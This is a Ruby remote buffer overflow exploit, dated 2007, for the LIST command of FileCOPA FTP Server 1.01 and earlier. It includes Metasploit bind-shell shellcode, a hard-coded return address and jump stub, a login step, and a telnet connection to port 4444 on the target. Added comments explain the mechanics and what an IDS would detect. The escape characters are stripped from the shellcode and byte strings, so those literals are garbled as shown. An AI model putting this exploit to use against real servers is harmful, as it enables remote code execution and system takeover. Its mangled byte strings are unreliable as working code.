# Title : FileCOPA FTP Server <= 1.01 (LIST) Remote Buffer Overflow Exploit (2)
# Published : 2007-04-06
# Author : Umesh Wanve
# =============================================================================================
# FileCOPA FTP Server <= 1.01 (LIST) Remote Buffer Overflow Exploit(2)
# By Umesh Wanve
# =============================================================================================
#
# Date : 05-04-2007
#
# Tested on Windows 2000 SP4 Server English
# Windows 2000 SP4 Professional English
#
#
# We can write some assembly instructions to jump into shellcode. At the time of EIP overwrite, ECX points to our
# whole request (LIST evil). So jumping forward into ECX points to our Shellcode. This was written coz i was learning
# ruby
#
# P.S. This was written for educational purposes. Use it at your own risk. The author will not be
# responsible for any damage.
#
# Always Thanks to Metasploit and Stroke
#===============================================================================================
require 'net/ftp'
# Script outline (flat script, no definitions): connect to the FTP service at
# `host`, log in, send one oversized LIST argument, then spawn telnet against
# port 4444 -- the LPORT named in the payload comment below.
# NOTE(review): the string literals in this listing look mangled by extraction,
# so byte counts stated in comments (e.g. Size=344) cannot be confirmed from the
# text as shown.
# win32_bind - EXITFUNC=seh LPORT=4444 Size=344 Encoder=PexFnstenvSub http://metasploit.com
shellcode = "x31xc9x83xe9xb0xd9xeexd9x74x24xf4x5bx81x73x13xf7"
shellcode += "x82xf8x80x83xebxfcxe2xf4x0bxe8x13xcdx1fx7bx07x7f"
shellcode += "x08xe2x73xecxd3xa6x73xc5xcbx09x84x85x8fx83x17x0b"
shellcode += "xb8x9ax73xdfxd7x83x13xc9x7cxb6x73x81x19xb3x38x19"
shellcode += "x5bx06x38xf4xf0x43x32x8dxf6x40x13x74xccxd6xdcxa8"
shellcode += "x82x67x73xdfxd3x83x13xe6x7cx8exb3x0bxa8x9exf9x6b"
shellcode += "xf4xaex73x09x9bxa6xe4xe1x34xb3x23xe4x7cxc1xc8x0b"
shellcode += "xb7x8ex73xf0xebx2fx73xc0xffxdcx90x0exb9x8cx14xd0"
shellcode += "x08x54x9exd3x91xeaxcbxb2x9fxf5x8bxb2xa8xd6x07x50"
shellcode += "x9fx49x15x7cxccxd2x07x56xa8x0bx1dxe6x76x6fxf0x82"
shellcode += "xa2xe8xfax7fx27xeax21x89x02x2fxafx7fx21xd1xabxd3"
shellcode += "xa4xd1xbbxd3xb4xd1x07x50x91xeaxe9xdcx91xd1x71x61"
shellcode += "x62xeax5cx9ax87x45xafx7fx21xe8xe8xd1xa2x7dx28xe8"
shellcode += "x53x2fxd6x69xa0x7dx2exd3xa2x7dx28xe8x12xcbx7exc9"
shellcode += "xa0x7dx2exd0xa3xd6xadx7fx27x11x90x67x8ex44x81xd7"
shellcode += "x08x54xadx7fx27xe4x92xe4x91xeax9bxedx7ex67x92xd0"
shellcode += "xaexabx34x09x10xe8xbcx09x15xb3x38x73x5dx7cxbaxad"
shellcode += "x09xc0xd4x13x7axf8xc0x2bx5cx29x90xf2x09x31xeex7f"
shellcode += "x82xc6x07x56xacxd5xaaxd1xa6xd3x92x81xa6xd3xadxd1"
shellcode += "x08x52x90x2dx2ex87x36xd3x08x54x92x7fx08xb5x07x50"
shellcode += "x7cxd5x04x03x33xe6x07x56xa5x7dx28xe8x07x08xfcxdf"
shellcode += "xa4x7dx2ex7fx27x82xf8x80"
host="10.217.100.130" #Target address (hard-coded; also concatenated into the shell command below)
pad ="A" * 160 # Buffer
eip = "x63x37x57x7c" #jmp esp from KERNEL32.DLL on Win2000 SP4 English
nop ="x90" * 12 # Nop Sled
nop1="x90" * 4
asm ="x33xc0xb0x10xc1xe0x04x03xc8xffxe1"
# 33 c0 xor eax, eax
# b0 10 mov al, 10
# c1 e0 04 shl eax,4
# 03 c8 add ecx,eax
# ff e1 jmp ecx
# Request argument as assembled: "Ax20" prefix, 160-byte pad, return address,
# 4-byte sled, jump stub, 12-byte sled, payload, trailer.
# Detection: a LIST argument of this size containing non-printable bytes is
# anomalous for FTP and is the observable an FTP-aware IDS or a proxy
# argument-length limit would key on; the title scopes the flaw to <= 1.01.
buffer ="Ax20" + pad + eip + nop1 + asm + nop + shellcode +"rn" # Our Evil Buffer
ftp = Net::FTP.new(host)
puts "++ Connecting to target...n"
# `user=` / `passwd=` are local-variable assignments whose values become the
# positional arguments, not named parameters; "test"/"test" is what is sent.
ftp.login(user="test", passwd="test") # User name and password
ftp.passive = true
sleep(2)
puts "++ Logging in....n" # printed after login has already completed above
sleep(2)
puts "++ Building Malicious Request ....n"
begin
ftp.list(buffer)
# Only Net::FTPError and its subclasses are rescued; a socket-level error such
# as Errno::ECONNRESET would propagate, skipping the telnet step and the close.
rescue Net::FTPError
$stderr.print "++ Done ...n"
end
puts "++ Connecting to target on port 4444....n"
# Shell command built by concatenation; acceptable only because `host` is a
# literal above. If it is ever read from input, prefer the argv form
# system("telnet", host, "4444") so no shell parses the string.
command= "telnet "+ host +" 4444"
system(command) # blocks until telnet exits
ftp.close # not reached if ftp.list raised anything other than Net::FTPError